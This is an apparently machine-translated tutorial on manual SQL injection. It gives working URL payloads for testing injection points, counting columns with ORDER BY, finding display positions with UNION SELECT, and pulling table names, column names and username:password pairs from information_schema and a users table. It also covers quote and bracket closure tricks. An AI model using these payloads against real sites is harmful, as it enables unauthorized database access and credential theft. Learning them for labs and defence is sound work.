? Parameters can be passed
<>sql Numerical injection
<>1. Judge the injection point
Numerical injection : ?id=1 and 1=1 , ?id=1 and 1=2
sentence :select * from Table name where id=1 and 1/2
<>2. Guess the number of fields ( dichotomy )
?id=1 order by x
<>3. Determine the display bit
?id=-1 union select 1,2,3,4 --+ // Joint inquiry No 1 2 3 4 column , Space –+ The function of is the content after the comment
When performing joint query to judge the display bit , stay 1 Add before - Number or change to 0 Let the front select Statement query is null error , Thus, the following statements are used for query
Joint query to construct false ,1 The front must be added - number , Or ?id=1 and
1=2 Error in constructing previous query statement , To use the following select sentence . Because there are two select sentence , To use - number / hold 1 Change to 0 Put the front select Statement comment out ( character , Digital type )
<>4. Collect information through display bits
?id=-1’ union select 1,2,3 --+ Page display 2,2 Display bit , Can be in the number 2 To construct attack statements
for example :?id=-1 union select 1,database(),user()# In display bit 2 Insert where database(), The page displays the current data name
<>5. data collection
Database data query through joint query
database() Database name group_concat( Listing ) All the contents of this column are separated by commas in a row
group_concat(str1,str2,……) All strings connecting a group , And separate each piece of data with a comma , Display data
Query all tables in the current database , And spliced in one line , Of multiple fields , for example 3 Not display bit ,2
Is the display bit used at this time from The query should be the last field after the space , Then remember to add notes , for example # group_concat(table_name),3 from
information_schema.tables where table_schema=database() --+
Query current database users All fields in the table , And spliced in one line group_concat(column_name) from
information_schema.columns where table_name='users' --+
Query current database users Middle table username and password Field information , And spliced in one line union select
1,group_concat(username,0x3a,password),3 from users--+
group_concat(table_name) To be placed in the display position , If there are multiple fields ,from Query the last field after the space , Otherwise, it will report an error !
<>sql Character injection
The biggest difference between character type and number type is , The numeric type does not require single quotation marks or other special symbols to close , The character type needs to be closed by special symbols , for example : Single quotation mark
<>1. Detection mode
If this is a background statement $sql=“SELECT * FROM users WHERE id=‘1’ LIMIT 0,1”
id The sheet is wrapped in quotation marks , that ,?id=‘1’ 1 namely $id Value in , This can be done when injection is required
?id='1 Then in id Construct attack statements in quotation marks ' ?id=-1' union select 1,2,3 --+
stay 1 Enclose the statement with a single quotation mark , Intermediate use union query , Then use the following statements --+ Comment out
for example : stay url Address field input ?id=1’ At this time 1 The following single quotation marks separate a pile of single quotation marks of the primitive sentence , Become ?id=‘1’’
, One more single quotation mark , Destroyed the original sql Sentence structure , And this statement is brought into the database for query , Because the database and front-end pages are interactive , Therefore, the front-end page will have exceptions or errors . But if we're here 1‘ Add after –+ Comment out the single quotation mark after it , That's true
?id=‘1’–+’, Make it consistent with the background statement , It won't be wrong
natural url ?id=1 1 There are single quotation marks around , We are url The single quotation marks of the original statement will not be displayed If input ?id=1' --+ In the background ?id='1'
--+' So we can ?id=1' Write attack statements here --+' originally id='1' this much backstage id='1 Insert attack statement inside '--+
If we enter 1’ Background display id=‘1’’ , If it cannot be closed in this way, an error will be reported , If an error is reported , It proves that this statement is successfully brought into the database query , Character type injection exists
resolvent : input id=1’ --+ , Space –+ Comment out the following single quotation marks , This creates a closure
<>2. Closure method
1. Continue to enter another one based on the original one ’
input 1’’ formation ’1’’’
front end url:?id=-1' union select 1,2,3' Background statement :$sql="SELECT * FROM users WHERE id='-1'
union select 1,2,3'' LIMIT 0,1"
2. use # To comment on the single quotation mark after
for example :$id=‘1’#’ Form closure
front end url:?id=-1' union select 1,2,3# Background statement :$sql="SELECT * FROM users WHERE id='-1'
union select 1,2,3#( Single quotation marks have been commented out here ) LIMIT 0,1"
3. use - Space perhaps --+. Inject in the page input box , You cannot use spaces -+ You have to put the back + Also replace with spaces ; stay url among , Need to use + To replace - Space after
Character injection : Detect the closing mode of the statement first , Single quotation mark , Double quotation marks, etc ; Then the injection statement should be followed by comments , Comment out the pre designed sql The characters after the statement and other unnecessary statements to achieve the closure of the injection statement , Otherwise, it will always report errors
<>3.sql Character injection utilization mode
front end url:?id=1 backstage :$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
stay 1 Followed by single quotation marks , brackets , Close its statement , Then add and 1=2 Let the front select Logical error in query statement , Use the following select
?id=1') and 1=2 union select 1,database(),user() --+
Technology